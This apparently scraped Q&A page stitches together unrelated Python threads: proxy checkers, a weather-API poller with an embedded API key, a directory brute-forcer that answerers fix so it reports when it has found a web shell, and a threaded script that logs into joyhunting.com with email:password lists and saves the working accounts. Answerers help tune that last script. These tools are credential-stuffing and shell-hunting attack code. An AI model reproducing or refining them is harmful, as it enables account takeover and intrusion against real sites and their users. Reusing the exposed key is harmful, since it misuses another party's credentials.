The code:
for item in pxfile.readlines():
if is_OK(item):
sys.stdout.write(item + "is not OK.")
item = make(item)
item = "#" + item
resfile.write(item)
else:
sys.stdout.write(item)
sys.stdout.write("is OK.")
line = make(item)
resfile.write(item)
If is_OK is true it means that the proxy doesn't exist, should fix that.
def is_OK(ip):
try:
proxy_handler = urllib2.ProxyHandler({'http': ip})
opener = urllib2.build_opener(proxy_handler)
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
urllib2.install_opener(opener)
req=urllib2.Request('http://www.icanhazip.com')
sock=urllib2.urlopen(req)
except urllib2.HTTPError, e:
#print 'Error code: ', e.code
return e.code
except Exception, detail:
#print "ERROR:", detail
return 1
return 0
It takes 10 minutes to get a list like this:
141.219.252.132:68664
is OK.118.174.0.155:8080
is OK.91.194.246.169:8080
is not OK.91.194.246.81:8080
is OK.201.245.110.138:8888
is OK.202.43.178.31:3128
is OK.202.109.80.106:8080
Is there a way to make it faster?
It's formatted badly, I tried removing the newline with strip()
but no luck.
Any ideas?
You should use threads to make the code run quicker :
import urllib2, threading
def is_OK(ip):
print 'Trying %s ...' % ip
try:
proxy_handler = urllib2.ProxyHandler({'http': ip})
opener = urllib2.build_opener(proxy_handler)
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
urllib2.install_opener(opener)
req=urllib2.Request('http://www.icanhazip.com')
urllib2.urlopen(req)
print '%s is OK' % ip
except urllib2.HTTPError:
print '%s is not OK' % ip
except Exception:
print '%s is not OK' % ip
a = threading.Thread(None, is_OK, None, ("hostname1",), None)
a.start()
b = threading.Thread(None, is_OK, None, ("hostname2",), None)
b.start()
First idea, set a shorter timeout than default one
timeout = 10
sock=urllib2.urlopen(req, None, timeout)
You may also use threading so you can test several connections simultaneously.
And for formatting, using strip() that way should be ok:
for line in pxfile:
item = line.strip()
if is_OK(item):
sys.stdout.write(item + " is not OK.\n")
resfile.write("# " + make(item) +"\n")
else:
sys.stdout.write(item + " is OK.\n")
resfile.write(make(item) +"\n")
Related
I test my proxies with this script and it gives many working but when i test the "working" proxies with an other proxy checker only a very little amount works.
Here is the part that's checking if the proxy works:
def process(self, task):
global alive
global dead
global tested
proxy = task
log_msg = str("Trying HTTP proxy%21s " % proxy)
cj = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(
urllib.request.HTTPCookieProcessor(cj),
urllib.request.HTTPRedirectHandler(),
urllib.request.ProxyHandler({'http': proxy})
)
try:
t1 = time.time()
response = opener.open(test_url, timeout=timeout_value).read()
tested += 1
t2 = time.time()
except Exception as e:
log_msg += "%s " % fail_msg
print(Fore.LIGHTRED_EX + log_msg)
dead += 1
tested += 1
return None
log_msg += ok_msg + "Response time: %d" % (int((t2-t1)*1000))
print(Fore.LIGHTGREEN_EX + log_msg)
text_file = open(out_filename, "a")
text_file.write(proxy + "\r\n")
text_file.close()
alive += 1
I am getting the following error with the script, i want to do is,
if i get a correct URL, i want it to check with BeautifulSoup if there is a form with value button "Send"
Traceback (most recent call last):
File "tester.py", line 27, in
if viewstate[0]['value'] == "Send":
IndexError: list index out of range
#!/usr/bin/env python
import urllib2
import sys
import os
url = sys.argv[1]
open_dir_list = open("dirlist.txt",'r')
dirs = open_dir_list.read().split("\n")
open_dir_list.close()
for dir in dirs:
uri = url+"/"+dir
try:
from BeautifulSoup import BeautifulStoneSoup
response = urllib2.urlopen(uri)
if response.getcode() == 200:
s = uri
soup = BeautifulStoneSoup(uri)
viewstate = soup.findAll("input", {"type": "submit"})
if viewstate[0]['value'] == "Send":
print("Yay!!!")
else:
print("There's nothing here")
except urllib2.HTTPError, e:
if e.code == 401:
print "[!] Authorization Required %s " % (uri)
elif e.code == 403:
print "[!] Forbidden %s " % (uri)
elif e.code == 404:
print "[-] Not Found %s " % (uri)
elif e.code == 503:
print "[!] Service Unavailable %s " % (uri)
else:
print "[?] Unknwon"
print "\n:. FINISH :.\n"
It is working fine with this script, but it only checks only a given path
import urllib
f = urllib.urlopen("http://xxx.xxx.xxx.xxx/button.jsp")
s = f.read()
f.close()
from BeautifulSoup import BeautifulStoneSoup
soup = BeautifulStoneSoup(s)
viewstate = soup.findAll("input", {"type": "submit"})
if viewstate[0]['value'] == "Send":
print(" Yay!!!")
else:
print("No Submit Button")
Apart from what I mentioned in a comment you are not passing the returned html you are passing uri = url+"/"+dir instead of response.read() to BeautifulSoup so you are searching for the tag in uri which I imagine certainly does not contain any tags. You need to pass read as below:
response = urllib2.urlopen(uri)
if response.getcode() == 200:
soup = BeautifulStoneSoup(response.read())
If you want the first match use .find using if viewstate to make sure it matched something, you can also iterate over the file object getting a line at a time:
from BeautifulSoup import BeautifulStoneSoup
import urllib2
import sys
url = sys.argv[1]
with open("dirlist.txt",'r') as f:
for dir in f:
uri = url + "/" + dir.rstrip()
try:
response = urllib2.urlopen(uri)
if response.getcode() == 200:
soup = BeautifulStoneSoup(response.read())
viewstate = soup.find("input", {"type": "submit"})
if viewstate and viewstate.get("value") == "Send":
print("Shell is found!! Yay!!!")
else:
print("There's nothing here")
except urllib2.HTTPError, e:
if e.code == 401:
print "[!] Authorization Required %s " % (uri)
elif e.code == 403:
print "[!] Forbidden %s " % (uri)
elif e.code == 404:
print "[-] Not Found %s " % (uri)
elif e.code == 503:
print "[!] Service Unavailable %s " % (uri)
else:
print "[?] Unknwon"
print "\n:. FINISH :.\n"
I have a interval of 60 and wanted to print 6 events every 1 minutes. But it prints 11,12 and 13 events randomly every 1 minutes. Why is that so ? Is it because of my codes or what other factors can cause this ?
My code is -
import logging
import httplib
import simplejson as json
import socket
import time
import datetime
import urllib2
import sys
import xml.dom.minidom
from bs4 import BeautifulSoup as soup
SCHEME = """<scheme>
<title>testingCurrentWeatherSG</title>
<description>Get data from forecast.</description>
<use_external_validation>true</use_external_validation>
<streaming_mode>simple</streaming_mode>
<endpoint>
<args>
<arg name="intervalone">
<title>Intervalone</title>
<description>How long to refresh this query?</description>
</arg>
</args>
</endpoint>
</scheme>
"""
def do_scheme():
print SCHEME
## Utility functions
def fahrenheit(fahren):
return (fahren-32) * 5.0/9.0
def get_percent(num):
return num * 100.
## Responses
def get_response(conn, url):
try:
conn.request('GET', url)
result = conn.getresponse()
data = result.read()
return json.loads(data)
except socket.timeout:
return None
## Printing
def print_forecast(name, di):
# Print the forcast from 'di', for location 'name'
# name is the name of the location, di is the api response
psi_avg=20
current = di['currently']
for key, value in sorted(current.iteritems()):
if key in ['cloudCover', 'icon', 'ozone', 'precipIntensity', # time
'precipProbability', 'precipType', 'pressure', 'summary',
'visibility', 'windBearing', 'windSpeed']:
print '{0} : {1}'.format(key, value)
elif key in ['temperature', 'dewPoint']:
print '%s: %.2f' % (key, fahrenheit(value))
elif key == 'humidity':
print '%s: %.2f' % (key, get_percent(value))
print 'psiAverage : ' + str(psi_avg)
print 'latitude : ' + str(di['latitude'])
print 'longitude : ' + str(di['longitude'])
print 'location : ' + str(name)
print
def weather_Connection(intervalone):
host = 'api.forecast.io'
conn = httplib.HTTPSConnection(host, timeout=60) # adjust timeout as desired
try:
urlnyp = '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.37871,103.848808'
conn.request('GET', urlnyp)
resultnyp = conn.getresponse()
contentnyp = resultnyp.read()
except socket.timeout:
print 'socket timeout'
return
# the locations and urls for the api calls
urls = {
'Choa Chu Kang': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.394557,103.746396',
'Kallang': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.311469,103.871399',
'Jurong West': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.352008,103.698599',
'Redhill': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.289732,103.81675',
'Tampines': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.353092,103.945229',
'Yishun': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.429463,103.84022',
}
responses = {}
for i, (name, url) in enumerate(sorted(urls.iteritems())):
response = get_response(conn, url)
if not response:
print 'socket timeout on url#%d: %s' % (i, url)
return
responses[name] = response
conn.close()
# print the forecast
for name, data in responses.iteritems():
print_forecast(name, data)
def get_config():
#Read XML Configuration data passed from splunkd on stdin
config = {}
try:
# read everything from stdin
config_str = sys.stdin.read()
# parse the config XML
doc = xml.dom.minidom.parseString(config_str)
root = doc.documentElement
conf_node = root.getElementsByTagName("configuration")[0]
if conf_node:
logging.debug("XML: found configuration")
stanza = conf_node.getElementsByTagName("stanza")[0]
if stanza:
stanza_name = stanza.getAttribute("name")
if stanza_name:
logging.debug("XML: found stanza " + stanza_name)
config["name"] = stanza_name
params = stanza.getElementsByTagName("param")
for param in params:
param_name = param.getAttribute("name")
logging.debug("XML: found param '%s'" % param_name)
if param_name and param.firstChild and \
param.firstChild.nodeType == param.firstChild.TEXT_NODE:
data = param.firstChild.data
config[param_name] = data
logging.debug("XML: '%s' -> '%s'" % (param_name, data))
if not config:
raise Exception, "Invalid configuration received from Splunk."
except Exception, e:
raise Exception, "Error getting Splunk configuration via STDIN: %s" % str(e)
return config
def run():
#The Main function that starts the action. The thread will sleep for however many seconds are configured via the Input.
# config = get_config()
#
#
# intervalone = config["intervalone"]
intervalone =60
while True:
weather_Connection(intervalone)
logging.info("Sleeping for %s seconds" %(intervalone))
time.sleep(float(intervalone))
if __name__ == '__main__':
if len(sys.argv) > 1:
if sys.argv[1] == "--scheme":
do_scheme()
else:
run()
sys.exit(0)
I've checked and tried your code and it works fine. Try replacing
logging.info("Sleeping for %s seconds" %(intervalone))
with
print("Sleeping for %s seconds" % (intervalone))
You should see this statement every 6 forecasts.
Note: why returning from weather_Connection() here
for i, (name, url) in enumerate(sorted(urls.iteritems())):
response = get_response(conn, url)
if not response:
print 'socket timeout on url#%d: %s' % (i, url)
return
responses[name] = response
You can just skip it with continue
for i, (name, url) in enumerate(sorted(urls.iteritems())):
response = get_response(conn, url)
if not response:
print 'socket timeout on url#%d: %s' % (i, url)
continue
responses[name] = response
i have some text file which contain proxy ip .
which look like following
130.14.29.111:80
130.14.29.120:80
130.159.235.31:80
14.198.198.220:8909
141.105.26.183:8000
160.79.35.27:80
164.77.196.75:80
164.77.196.78:45430
164.77.196.78:80
173.10.134.173:8081
174.132.145.80:80
174.137.152.60:8080
174.137.184.37:8080
174.142.125.161:80
after processing check this proxy , then i want to marked as following
total number of '0' = 8
total number of 'x' = 6
percentage = alive 60% , dead 40%
x 130.14.29.111:80
0 130.14.29.120:80
0 130.159.235.31:80
0 14.198.198.220:8909
0 141.105.26.183:8000
0 160.79.35.27:80
x 164.77.196.75:80
x 164.77.196.78:45430
x 164.77.196.78:80
0 173.10.134.173:8081
0 174.132.145.80:80
0 174.137.152.60:8080
x 174.137.184.37:8080
x 174.142.125.161:80
how can be done with python? or some sample
if anyone would help me or enlight me much aprreciate!
i was edited
this is script source of what i have
finally check finished proxy list are saved to 'proxy_alive.txt'
in this file i want to mark whether proxy element alive or not.
import socket
import urllib2
import threading
import sys
import Queue
import socket
socket.setdefaulttimeout(7)
print "Bobng's proxy checker. Using %s second timeout"%(socket.getdefaulttimeout())
#input_file = sys.argv[1]
#proxy_type = sys.argv[2] #options: http,s4,s5
#output_file = sys.argv[3]
input_file = 'proxylist.txt'
proxy_type = 'http'
output_file = 'proxy_alive.txt'
url = "www.seemyip.com" # Don't put http:// in here, or any /'s
check_queue = Queue.Queue()
output_queue = Queue.Queue()
threads = 20
def writer(f,rq):
while True:
line = rq.get()
f.write(line+'\n')
def checker(q,oq):
while True:
proxy_info = q.get() #ip:port
if proxy_info == None:
print "Finished"
#quit()
return
#print "Checking %s"%proxy_info
if proxy_type == 'http':
try:
listhandle = open("proxylist.txt").read().split('\n')
for line in listhandle:
saveAlive = open("proxy_alive.txt", 'a')
details = line.split(':')
email = details[0]
password = details[1].replace('\n', '')
proxy_handler = urllib2.ProxyHandler({'http':proxy_info})
opener = urllib2.build_opener(proxy_handler)
opener.addheaders = [('User-agent','Mozilla/5.0')]
urllib2.install_opener(opener)
req = urllib2.Request("http://www.google.com")
sock=urllib2.urlopen(req, timeout= 7)
rs = sock.read(1000)
if '<title>Google</title>' in rs:
oq.put(proxy_info)
print '[+] alive proxy' , proxy_info
saveAlive.write(line)
saveAlive.close()
except urllib2.HTTPError,e:
print 'url open error? slow?'
pass
except Exception,detail:
print '[-] bad proxy' ,proxy_info
else:
# gotta be socks
try:
s = socks.socksocket()
if proxy_type == "s4":
t = socks.PROXY_TYPE_SOCKS4
else:
t = socks.PROXY_TYPE_SOCKS5
ip,port = proxy_info.split(':')
s.setproxy(t,ip,int(port))
s.connect((url,80))
oq.put(proxy_info)
print proxy_info
except Exception,error:
print proxy_info
threading.Thread(target=writer,args=(open(output_file,"wb"),output_queue)).start()
for i in xrange(threads):
threading.Thread(target=checker,args=(check_queue,output_queue)).start()
for line in open(input_file).readlines():
check_queue.put(line.strip('\n'))
print "File reading done"
for i in xrange(threads):
check_queue.put(None)
raw_input("PRESS ENTER TO QUIT")
sys.exit(0)
You can use a queue to queue all the list of address and their meta information.
After you are done with your operation on this ip addresses, you can write it back to the same file with 'w' mode.
[ ( ip-address-1,'x' ), ( ip-address-2, '0'), ...... ]
Hell All.
i was made some python script with thread which checking some of account exist in some website
if i run thread 1 , it working well but if increase thread such like 3~5 and above,
result was very different compare with thread 1 and i was checked manually and
if i increase thread result was not correct.
i think some of my thread code have to tune or how about use Queue module ?
anyone can advice or tuneing my script? Thanks in advance!
# -*- coding: cp949 -*-
import sys,os
import mechanize, urllib
import cookielib
import re
from BeautifulSoup import BeautifulSoup,BeautifulStoneSoup,Tag
import re,sys,os,mechanize,urllib,threading,time
# Maximum number of process to spawn at any one given time.
MAX_PROCS =5
maillist = "daum.txt"
threads = []
SAVEFILE = 'valid_joyhunt.txt'
# Threading class
class CheckMyThread ( threading.Thread ):
llemail = ""
llpassword = ""
def __init__ ( self , lemail, lpassword):
self.llemail = lemail
self.llpassword = lpassword
threading.Thread.__init__( self )
pass
def run ( self ):
valid = []
llemail = self.llemail
llpassword = self.llpassword
try:
params = urllib.urlencode({'userid':llemail, 'passwd':llpassword})
rq = mechanize.Request("http://www.joyhunting.com/include/member/login_ok1.asp", params)
rs = mechanize.urlopen(rq)
data = rs.read()
logged_in = r'var _id' in data #정상 로그인
if logged_in :
rq = mechanize.Request("http://www.joyhunting.com/myjoy/new_myjoy.asp")
rs = mechanize.urlopen(rq)
maindata = rs.read(50024)
jun_member = r"준회원"
save = open(SAVEFILE, 'a')
for match in re.finditer(r'<td height="28" colspan="2" style="PADDING-left: 16px">현재 <strong>(.*?)</strong>', maindata):
matched = match.group(1)
for match2 in re.finditer(r"var _gd(.*?);", data):
matched2 = match2.group(1)
print '%s, %s' %(matched, matched2)
break
rq1=mechanize.Request("http://www.joyhunting.com/webchat/applyweb/sendmessage_HPCK_step1.asp?reURL=1&myid="+llemail+"&ToID=undefined&hide=undefined")
rs1=mechanize.urlopen(rq1)
sendmsg= rs1.read()
#print sendmsg
match3 = ''
for match3 in re.finditer(r":'\+(.*?)\);", sendmsg):
matched3 = match3.group(1)
#print matched3
print 'bad'
break
if match3 =='':
save.write('%s, %s, %s:%s ' %(matched, matched2, llemail, llpassword + '\n'))
save.close()
print '[+] Checking: %s:%s -> Good!' % (llemail, llpassword)
else:
print '[-] Checking: %s:%s -> bad account!' % (llemail, llpassword)
return 0
except:
print '[!] Exception checking %s.' % (llemail)
return 1
return 0
try:
listhandle = open(maillist);
#Bail out if the file doesn't exist
except:
print '[!] %s does not exist. Please create the file!' % (maillist)
exit (2)
#Loop through the file
for line in listhandle:
#Parse the line
try:
details = line.split(':')
email = details[0]
password = details[1].replace('\n', '')
#Throw an error and exit.
except:
print '[!] Parse Error in %s on line %n.' % (maillist, currline)
exit
#Run a while statement:
if len(threads) < MAX_PROCS:
#Fork out into another process
print '[ ] Starting thread to check account %s.' % (email);
thread = CheckMyThread(email, password)
thread.start()
threads.append(thread)
else:
#Wait for a thread to exit.
gonext = 0
while 1 == 1:
i = 0
#print '[ ] Checking for a thread to exit...'
while i < len(threads):
#print '[ ] %d' % (i)
try:
if threads[i]:
if not threads[i].isAlive():
#print '[-] Thread %d is dead' % (i)
threads.pop(i)
print '[ ] Starting thread to check account %s.' % (email);
thread = CheckMyThread(email, password)
thread.start()
threads.append(thread)
gonext = 1
break
else:
#print '[+] Thread %d is still running' % (i)
pass
else:
print '[ ] Crap.';
except NameError:
print '[ ] AWWW COME ON!!!!'
i = i + 1
time.sleep(0.050);
if gonext:
break
Can You please specify what are different results?
From what I see, code is doing much more than verifying account.
From what I see, You're appending to a single file from multiple threads, I'd say it's not thread-safe.
Also, AFAIK Mechanize uses shared cookie storage for all requests, so they are probably interfering. Use separate mechanize.Browser() inside run() instead of mechanize.Request().